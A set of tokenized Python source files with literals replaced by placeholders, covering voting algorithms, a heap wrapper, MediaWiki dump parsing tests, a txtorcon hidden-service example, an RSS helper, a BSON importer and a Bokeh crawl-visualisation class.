winners . 
append ( ( v , k ) ) <EOL> return winners <EOL> def borda ( votes , ignored = set ( ) , mode = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> winners = { } <EOL> n = len ( votes [ <NUM_LIT:0> ] ) <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> if len ( vote ) != len ( set ( vote ) ) : <EOL> raise InvalidVote <EOL> for k , item in enumerate ( vote ) : <EOL> if not item in ignored : <EOL> if mode == '<STR_LIT>' : <EOL> delta = linear * ( n - k ) <EOL> elif mode == '<STR_LIT>' : <EOL> delta = <NUM_LIT:1.0> / ( k + <NUM_LIT:1> ) <EOL> elif mode == '<STR_LIT>' : <EOL> delta = n ** ( n - k - <NUM_LIT:1> ) <EOL> winners [ item ] = winners . get ( item , <NUM_LIT:0> ) + delta <EOL> winners = [ ( v , k ) for ( k , v ) in winners . items ( ) ] <EOL> winners . sort ( ) <EOL> return winners <EOL> def schulze ( votes ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> p = { } <EOL> candidates = list ( reduce ( lambda a , b : a & b , [ set ( vote ) for vote in votes ] ) ) <EOL> map_candid = dict ( ( k , i ) for ( i , k ) in enumerate ( candidates ) ) <EOL> n = len ( candidates ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> d [ i , j ] = p [ i , j ] = <NUM_LIT:0> <EOL> for vote in votes : <EOL> if is_valid ( vote ) : <EOL> for i in range ( <NUM_LIT:0> , n - <NUM_LIT:1> ) : <EOL> for j in range ( i + <NUM_LIT:1> , n ) : <EOL> key = ( map_candid [ vote [ i ] ] , map_candid [ vote [ j ] ] ) <EOL> d [ key ] += <NUM_LIT:1> <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if i != j : <EOL> p [ i , j ] = d [ i , j ] if d [ i , j ] > d [ j , i ] else <NUM_LIT:0> <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if i != j : <EOL> for k in range ( n ) : <EOL> if k != i and k != j : <EOL> p [ j , k ] = max ( p [ j , k ] , min ( p [ j , i ] , p [ i , k ] ) ) <EOL> winners = range ( n ) <EOL> winners . 
sort ( lambda i , j : cmp ( p [ i , j ] , p [ j , i ] ) ) <EOL> return [ ( i , candidates [ k ] ) for ( i , k ) in enumerate ( winners ) ] <EOL> def test ( nsamples = <NUM_LIT:10> ) : <EOL> diff_iro_borda = <NUM_LIT:0> <EOL> diff_iro_schulze = <NUM_LIT:0> <EOL> diff_borda_schulze = <NUM_LIT:0> <EOL> for k in range ( nsamples ) : <EOL> votes = makeup_votes ( <NUM_LIT:10> ) <EOL> a = iro ( votes ) <EOL> b = borda ( votes , mode = "<STR_LIT>" ) <EOL> c = schulze ( votes ) <EOL> if a [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != b [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_iro_borda += <NUM_LIT:1> <EOL> if a [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != c [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_iro_schulze += <NUM_LIT:1> <EOL> if b [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] != c [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> diff_borda_schulze += <NUM_LIT:1> <EOL> print diff_iro_borda , diff_iro_schulze , diff_borda_schulze <EOL> def test_schulze ( ) : <EOL> votes = [ ] <EOL> for i in range ( <NUM_LIT:5> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:5> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:8> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:3> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:7> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:2> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:7> ) : votes . append ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:8> ) : votes . append ( '<STR_LIT>' ) <EOL> assert schulze ( votes ) == [ ( <NUM_LIT:0> , '<STR_LIT:D>' ) , ( <NUM_LIT:1> , '<STR_LIT:B>' ) , ( <NUM_LIT:2> , '<STR_LIT:C>' ) , ( <NUM_LIT:3> , '<STR_LIT:A>' ) , ( <NUM_LIT:4> , '<STR_LIT:E>' ) ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test ( ) <EOL> test_schulze ( ) <EOL> votes = makeup_votes ( <NUM_LIT:10> ) <EOL> print borda ( votes , mode = "<STR_LIT>" ) <EOL> print iro ( votes ) <EOL> print schulze ( votes ) </s>
<s> """<STR_LIT>""" <EOL> class BlockedTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SkipTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DeprecatedTest ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> class Book : <EOL> title = "<STR_LIT>" <EOL> authors = [ ] <EOL> pages = <NUM_LIT:0> <EOL> def print_book ( self ) : <EOL> print self . title <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:=>" * <NUM_LIT:15> <EOL> for author in self . authors : <EOL> print author <EOL> print "<STR_LIT>" , self . pages </s>
<s> from collections import namedtuple <EOL> from ... util import ordered <EOL> from . import defaults <EOL> Revert = namedtuple ( "<STR_LIT>" , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> """<STR_LIT>""" <EOL> class Detector ( ordered . HistoricalMap ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , radius = defaults . RADIUS ) : <EOL> """<STR_LIT>""" <EOL> if radius < <NUM_LIT:1> : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( ) . __init__ ( maxlen = radius + <NUM_LIT:1> ) <EOL> def process ( self , checksum , revision = None ) : <EOL> """<STR_LIT>""" <EOL> revert = None <EOL> if checksum in self : <EOL> reverteds = list ( self . up_to ( checksum ) ) <EOL> if len ( reverteds ) > <NUM_LIT:0> : <EOL> revert = Revert ( revision , reverteds , self [ checksum ] ) <EOL> self . insert ( checksum , revision ) <EOL> return revert </s>
<s> import heapq <EOL> class Heap ( list ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> list . __init__ ( self , * args , ** kwargs ) <EOL> heapq . heapify ( self ) <EOL> def pop ( self ) : <EOL> return heapq . heappop ( self ) <EOL> def push ( self , item ) : <EOL> heapq . heappush ( self , item ) <EOL> def peek ( self ) : <EOL> return self [ <NUM_LIT:0> ] <EOL> def pushpop ( self , item ) : <EOL> return heapq . heappushpop ( self , item ) <EOL> def poppush ( self , itemp ) : <EOL> return heapq . replace ( self , item ) </s>
<s> import io <EOL> from nose . tools import eq_ , assert_is_instance <EOL> from ... . types import Timestamp <EOL> from . . iterator import Iterator <EOL> from . . comment import Comment <EOL> from . . text import Text <EOL> from . . revision import Revision <EOL> from . . page import Page <EOL> SAMPLE_XML = """<STR_LIT>""" <EOL> def test_complete ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> eq_ ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , list ( ns . id for ns in dump . namespaces ) ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> eq_ ( page . redirect , None ) <EOL> eq_ ( page . restrictions , [ ] ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:1> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , <NUM_LIT> ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> eq_ ( revision . beginningofpage , True ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:2> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . comment , Comment ) <EOL> eq_ ( revision . 
comment , "<STR_LIT>" ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> eq_ ( revision . beginningofpage , False ) <EOL> page = next ( dump ) <EOL> assert_is_instance ( page , Page ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:1> ) <EOL> eq_ ( page . id , <NUM_LIT:2> ) <EOL> eq_ ( page . redirect . title , "<STR_LIT>" ) <EOL> eq_ ( page . restrictions , [ "<STR_LIT>" ] ) <EOL> revision = next ( page ) <EOL> assert_is_instance ( revision , Revision ) <EOL> eq_ ( revision . id , <NUM_LIT:3> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> assert_is_instance ( str ( page ) , str ) <EOL> revision = next ( page ) <EOL> assert_is_instance ( revision , Revision ) <EOL> eq_ ( revision . id , <NUM_LIT:4> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor , None ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text . bytes , <NUM_LIT> ) <EOL> eq_ ( revision . text . id , <NUM_LIT> ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> assert_is_instance ( str ( revision ) , str ) <EOL> def test_skipping ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> page = next ( dump ) <EOL> eq_ ( page . 
title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:1> ) <EOL> eq_ ( page . id , <NUM_LIT:2> ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:3> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> assert_is_instance ( revision . text , Text ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> def test_serialization ( ) : <EOL> f = io . StringIO ( SAMPLE_XML ) <EOL> dump = Iterator . from_file ( f ) <EOL> eq_ ( dump , Iterator . deserialize ( dump . serialize ( ) ) ) <EOL> def test_from_page_xml ( ) : <EOL> page_xml = """<STR_LIT>""" <EOL> dump = Iterator . from_page_xml ( io . StringIO ( page_xml ) ) <EOL> eq_ ( dump . namespaces , [ ] ) <EOL> page = next ( dump ) <EOL> eq_ ( page . title , "<STR_LIT>" ) <EOL> eq_ ( page . namespace , <NUM_LIT:0> ) <EOL> eq_ ( page . id , <NUM_LIT:1> ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:1> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , <NUM_LIT> ) <EOL> eq_ ( revision . contributor . user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , None ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) <EOL> revision = next ( page ) <EOL> eq_ ( revision . id , <NUM_LIT:2> ) <EOL> eq_ ( revision . timestamp , Timestamp ( "<STR_LIT>" ) ) <EOL> eq_ ( revision . contributor . id , None ) <EOL> eq_ ( revision . contributor . 
user_text , "<STR_LIT>" ) <EOL> eq_ ( revision . text , "<STR_LIT>" ) <EOL> eq_ ( revision . sha1 , "<STR_LIT>" ) <EOL> eq_ ( revision . comment , "<STR_LIT>" ) <EOL> eq_ ( revision . model , "<STR_LIT>" ) <EOL> eq_ ( revision . format , "<STR_LIT>" ) </s>
<s> import shutil <EOL> from twisted . internet import reactor <EOL> from twisted . web import server , resource <EOL> from twisted . internet . endpoints import serverFromString <EOL> import txtorcon <EOL> class Simple ( resource . Resource ) : <EOL> isLeaf = True <EOL> def render_GET ( self , request ) : <EOL> return "<STR_LIT>" <EOL> site = server . Site ( Simple ( ) ) <EOL> def setup_failed ( arg ) : <EOL> print "<STR_LIT>" , arg <EOL> def setup_complete ( port ) : <EOL> local = txtorcon . IHiddenService ( port ) . local_address . getHost ( ) <EOL> print "<STR_LIT>" , port . getHost ( ) <EOL> print "<STR_LIT>" , local <EOL> def progress ( percent , tag , message ) : <EOL> bar = int ( percent / <NUM_LIT:10> ) <EOL> print '<STR_LIT>' % ( '<STR_LIT:#>' * bar , '<STR_LIT:.>' * ( <NUM_LIT:10> - bar ) , message ) <EOL> hs_endpoint1 = serverFromString ( reactor , "<STR_LIT>" ) <EOL> hs_endpoint2 = serverFromString ( reactor , "<STR_LIT>" ) <EOL> txtorcon . IProgressProvider ( hs_endpoint1 ) . add_progress_listener ( progress ) <EOL> txtorcon . IProgressProvider ( hs_endpoint2 ) . add_progress_listener ( progress ) <EOL> d1 = hs_endpoint1 . listen ( site ) <EOL> d2 = hs_endpoint2 . listen ( site ) <EOL> d1 . addCallback ( setup_complete ) . addErrback ( setup_failed ) <EOL> d2 . addCallback ( setup_complete ) . addErrback ( setup_failed ) <EOL> reactor . run ( ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import with_statement <EOL> from txtorcon . _metadata import __version__ , __author__ , __contact__ <EOL> from txtorcon . _metadata import __license__ , __copyright__ , __url__ <EOL> from txtorcon . router import Router <EOL> from txtorcon . circuit import Circuit <EOL> from txtorcon . circuit import build_timeout_circuit <EOL> from txtorcon . circuit import CircuitBuildTimedOutError <EOL> from txtorcon . stream import Stream <EOL> from txtorcon . torcontrolprotocol import connect <EOL> from txtorcon . torcontrolprotocol import TorControlProtocol <EOL> from txtorcon . torcontrolprotocol import TorProtocolError <EOL> from txtorcon . torcontrolprotocol import TorProtocolFactory <EOL> from txtorcon . torcontrolprotocol import DEFAULT_VALUE <EOL> from txtorcon . torstate import TorState <EOL> from txtorcon . torstate import build_tor_connection <EOL> from txtorcon . torstate import build_local_tor_connection <EOL> from txtorcon . torconfig import TorConfig <EOL> from txtorcon . torconfig import HiddenService <EOL> from txtorcon . torconfig import EphemeralHiddenService <EOL> from txtorcon . torconfig import TorProcessProtocol <EOL> from txtorcon . torconfig import launch_tor <EOL> from txtorcon . torconfig import TorNotFound <EOL> from txtorcon . torinfo import TorInfo <EOL> from txtorcon . addrmap import AddrMap <EOL> from txtorcon . endpoints import TorOnionAddress <EOL> from txtorcon . endpoints import TorOnionListeningPort <EOL> from txtorcon . endpoints import TCPHiddenServiceEndpoint <EOL> from txtorcon . endpoints import TCPHiddenServiceEndpointParser <EOL> from txtorcon . endpoints import TorClientEndpoint <EOL> from txtorcon . endpoints import TorClientEndpointStringParser <EOL> from txtorcon . endpoints import IHiddenService , IProgressProvider <EOL> from txtorcon . 
endpoints import get_global_tor <EOL> from . import util <EOL> from . import interface <EOL> from txtorcon . interface import ( <EOL> ITorControlProtocol , <EOL> IStreamListener , IStreamAttacher , StreamListenerMixin , <EOL> ICircuitContainer , ICircuitListener , CircuitListenerMixin , <EOL> IRouterContainer , IAddrListener , <EOL> ) <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from waltz import web , db <EOL> from datetime import datetime <EOL> from lazydb import Db <EOL> class Analytics : <EOL> def GET ( self ) : <EOL> web . header ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) <EOL> return db ( ) . get ( '<STR_LIT>' ) <EOL> def rss ( items_func , template = None , ** kwargs ) : <EOL> rss = RSS ( template = template , ** kwargs ) <EOL> class RSSfeed : <EOL> def GET ( self ) : <EOL> web . header ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) <EOL> return rss . feed ( items_func ( ) ) <EOL> return RSSfeed <EOL> class RSS : <EOL> _template = """<STR_LIT>""" <EOL> def __init__ ( self , template = None , ** kwargs ) : <EOL> template = template or self . _template <EOL> self . kwargs = kwargs <EOL> if template == self . _template : <EOL> for ( k , v ) in [ ( '<STR_LIT:title>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:description>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:date>' , datetime . now ( ) . ctime ( ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> kwargs . setdefault ( k , v ) <EOL> self . template = web . template . Template ( template ) <EOL> def feed ( self , items ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT>' : items } <EOL> kwargs . update ( self . kwargs ) <EOL> return self . template ( ** kwargs ) </s>
<s> import bson <EOL> import os <EOL> import simplejson as json <EOL> import struct <EOL> import memcacheConstants <EOL> import pump <EOL> BSON_SCHEME = "<STR_LIT>" <EOL> class BSONSource ( pump . Source ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , opts , spec , source_bucket , source_node , <EOL> source_map , sink_map , ctl , cur ) : <EOL> super ( BSONSource , self ) . __init__ ( opts , spec , source_bucket , source_node , <EOL> source_map , sink_map , ctl , cur ) <EOL> self . done = False <EOL> self . f = None <EOL> @ staticmethod <EOL> def can_handle ( opts , spec ) : <EOL> return spec . startswith ( BSON_SCHEME ) and os . path . isfile ( spec . replace ( BSON_SCHEME , "<STR_LIT>" ) ) <EOL> @ staticmethod <EOL> def check ( opts , spec ) : <EOL> return <NUM_LIT:0> , { '<STR_LIT>' : spec , <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : os . path . basename ( spec ) , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' } ] } ] } <EOL> @ staticmethod <EOL> def provide_design ( opts , source_spec , source_bucket , source_map ) : <EOL> return <NUM_LIT:0> , None <EOL> def provide_batch ( self ) : <EOL> if self . done : <EOL> return <NUM_LIT:0> , None <EOL> if not self . f : <EOL> try : <EOL> self . f = open ( self . spec . replace ( BSON_SCHEME , "<STR_LIT>" ) ) <EOL> except IOError , e : <EOL> return "<STR_LIT>" % ( self . spec , e ) , None <EOL> batch = pump . Batch ( self ) <EOL> batch_max_size = self . opts . extra [ '<STR_LIT>' ] <EOL> batch_max_bytes = self . opts . extra [ '<STR_LIT>' ] <EOL> cmd = memcacheConstants . CMD_TAP_MUTATION <EOL> vbucket_id = <NUM_LIT> <EOL> cas , exp , flg = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> while ( self . f and <EOL> batch . size ( ) < batch_max_size and <EOL> batch . bytes < batch_max_bytes ) : <EOL> doc_size_buf = self . f . read ( <NUM_LIT:4> ) <EOL> if not doc_size_buf : <EOL> self . done = True <EOL> self . f . close ( ) <EOL> self . f = None <EOL> break <EOL> doc_size , = struct . 
unpack ( "<STR_LIT>" , doc_size_buf ) <EOL> doc_buf = self . f . read ( doc_size - <NUM_LIT:4> ) <EOL> if not doc_buf : <EOL> self . done = True <EOL> self . f . close ( ) <EOL> self . f = None <EOL> break <EOL> doc = bson . _elements_to_dict ( doc_buf , dict , True ) <EOL> key = doc [ '<STR_LIT>' ] <EOL> doc_json = json . dumps ( doc ) <EOL> msg = ( cmd , vbucket_id , key , flg , exp , cas , '<STR_LIT>' , doc_json ) <EOL> batch . append ( msg , len ( doc ) ) <EOL> if batch . size ( ) <= <NUM_LIT:0> : <EOL> return <NUM_LIT:0> , None <EOL> return <NUM_LIT:0> , batch </s>
<s> import os <EOL> from . flann_imagecontentsearch import FlannImageContentSearch <EOL> def load ( info ) : <EOL> index = '<STR_LIT>' <EOL> if index not in os . environ or os . environ [ index ] == '<STR_LIT>' : <EOL> raise Exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % index ) <EOL> else : <EOL> os . environ [ index ] = os . environ [ index ] . rstrip ( '<STR_LIT:/>' ) <EOL> info [ '<STR_LIT>' ] . flann_imagecontentsearch = FlannImageContentSearch ( ) </s>
<s> from __future__ import division <EOL> from __future__ import print_function <EOL> from datetime import datetime <EOL> import json <EOL> from Queue import Empty <EOL> import numpy as np <EOL> from bokeh . plotting import figure , output_server <EOL> from kombu import Exchange , Connection , Queue <EOL> from bokeh . models . glyphs import Segment <EOL> from bokeh . models . markers import Circle <EOL> from bokeh . models import Range1d , ColumnDataSource <EOL> from bokeh . models . grids import Grid <EOL> from bokeh . embed import autoload_server <EOL> from bokeh . session import Session <EOL> from bokeh . document import Document <EOL> DEFAULT_NUM_URLS = <NUM_LIT> <EOL> URL_CHAR_WIDTH = <NUM_LIT:50> <EOL> EXCHANGE_NAME = "<STR_LIT>" <EOL> PLOT_CIRCLES = False <EOL> def init_plot ( crawl_name ) : <EOL> session = Session ( ) <EOL> document = Document ( ) <EOL> session . use_doc ( crawl_name ) <EOL> session . load_document ( document ) <EOL> if document . context . children : <EOL> plot = document . context . children [ <NUM_LIT:0> ] <EOL> else : <EOL> output_server ( crawl_name ) <EOL> current = np . datetime64 ( datetime . now ( ) ) <EOL> xdr = Range1d ( current , current + <NUM_LIT:1> ) <EOL> ydr = [ "<STR_LIT>" ] <EOL> plot = figure ( title = "<STR_LIT>" , tools = "<STR_LIT>" , <EOL> x_axis_type = "<STR_LIT>" , y_axis_location = "<STR_LIT:right>" , x_range = xdr , y_range = ydr , <EOL> width = <NUM_LIT> , height = <NUM_LIT> ) <EOL> plot . toolbar_location = None <EOL> plot . xgrid . grid_line_color = None <EOL> plot . ygrid . grid_line_color = None <EOL> plot . xaxis . minor_tick_line_color = None <EOL> plot . xaxis . major_tick_line_color = None <EOL> plot . xaxis . major_label_text_font_size = '<STR_LIT>' <EOL> plot . yaxis . minor_tick_line_color = None <EOL> plot . yaxis . major_tick_line_color = None <EOL> plot . yaxis . major_label_text_font_size = '<STR_LIT>' <EOL> document . add ( plot ) <EOL> session . 
store_document ( document ) <EOL> script = autoload_server ( plot , session ) <EOL> script = script . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return script <EOL> class NutchUrlTrails : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def strip_url ( url ) : <EOL> """<STR_LIT>""" <EOL> stripped_url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> if len ( stripped_url ) <= URL_CHAR_WIDTH : <EOL> return stripped_url <EOL> else : <EOL> return stripped_url [ : int ( URL_CHAR_WIDTH / <NUM_LIT:2> ) ] + '<STR_LIT>' + stripped_url [ - int ( URL_CHAR_WIDTH / <NUM_LIT:2> ) - <NUM_LIT:3> : ] <EOL> @ staticmethod <EOL> def jtime_to_datetime ( t ) : <EOL> """<STR_LIT>""" <EOL> return np . datetime64 ( datetime . fromtimestamp ( t / <NUM_LIT> ) ) <EOL> def __init__ ( self , crawl_name , num_urls = DEFAULT_NUM_URLS ) : <EOL> """<STR_LIT>""" <EOL> self . crawl_name = crawl_name <EOL> self . num_urls = num_urls <EOL> self . open_urls = { } <EOL> self . closed_urls = { } <EOL> self . old_segments = None <EOL> self . old_circles = None <EOL> self . session = Session ( ) <EOL> self . session . use_doc ( self . crawl_name ) <EOL> self . document = Document ( ) <EOL> con = Connection ( ) <EOL> exchange = Exchange ( EXCHANGE_NAME , '<STR_LIT>' , durable = False ) <EOL> queue = Queue ( crawl_name , exchange = exchange , routing_key = crawl_name ) <EOL> self . queue = con . SimpleQueue ( name = queue ) <EOL> def handle_messages ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( <NUM_LIT> ) : <EOL> try : <EOL> m = self . queue . get ( block = True , timeout = <NUM_LIT:1> ) <EOL> self . parse_message ( m ) <EOL> except Empty : <EOL> break <EOL> self . plot_urls ( ) <EOL> def parse_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> print ( message . body ) <EOL> message = json . loads ( message . 
body ) <EOL> url = message [ "<STR_LIT:url>" ] <EOL> if message [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> self . open_urls [ url ] = NutchUrlTrails . jtime_to_datetime ( message [ "<STR_LIT>" ] ) <EOL> elif message [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if url in self . open_urls : <EOL> self . closed_urls [ url ] = ( self . open_urls [ url ] , NutchUrlTrails . jtime_to_datetime ( message [ "<STR_LIT>" ] ) ) <EOL> del self . open_urls [ url ] <EOL> else : <EOL> pass <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def plot_urls ( self ) : <EOL> """<STR_LIT>""" <EOL> self . session . load_document ( self . document ) <EOL> plot = self . document . context . children [ <NUM_LIT:0> ] <EOL> if not ( self . open_urls or self . closed_urls ) : <EOL> return <EOL> x0 = [ ] <EOL> x = [ ] <EOL> urls = [ ] <EOL> circles = [ ] <EOL> circle_urls = [ ] <EOL> current_time = np . datetime64 ( datetime . now ( ) ) <EOL> for url , start_t in self . open_urls . items ( ) : <EOL> url = NutchUrlTrails . strip_url ( url ) <EOL> x0 . append ( start_t ) <EOL> x . append ( current_time ) <EOL> urls . append ( url ) <EOL> for url , ( start_t , end_t ) in self . closed_urls . items ( ) : <EOL> url = NutchUrlTrails . strip_url ( url ) <EOL> x0 . append ( start_t ) <EOL> x . append ( end_t ) <EOL> circles . append ( end_t ) <EOL> urls . append ( url ) <EOL> circle_urls . append ( url ) <EOL> x0 = np . asarray ( x0 ) <EOL> x = np . asarray ( x ) <EOL> circles = np . asarray ( circles ) <EOL> sort_index = np . argsort ( x0 ) [ : : - <NUM_LIT:1> ] <EOL> x0 = x0 [ sort_index ] <EOL> x = x [ sort_index ] <EOL> urls = [ urls [ i ] for i in sort_index ] <EOL> if self . closed_urls : <EOL> circle_sort_index = np . argsort ( circles ) [ : : - <NUM_LIT:1> ] <EOL> circles = circles [ circle_sort_index ] <EOL> circle_urls = [ circle_urls [ i ] for i in circle_sort_index ] <EOL> active_x0 = x0 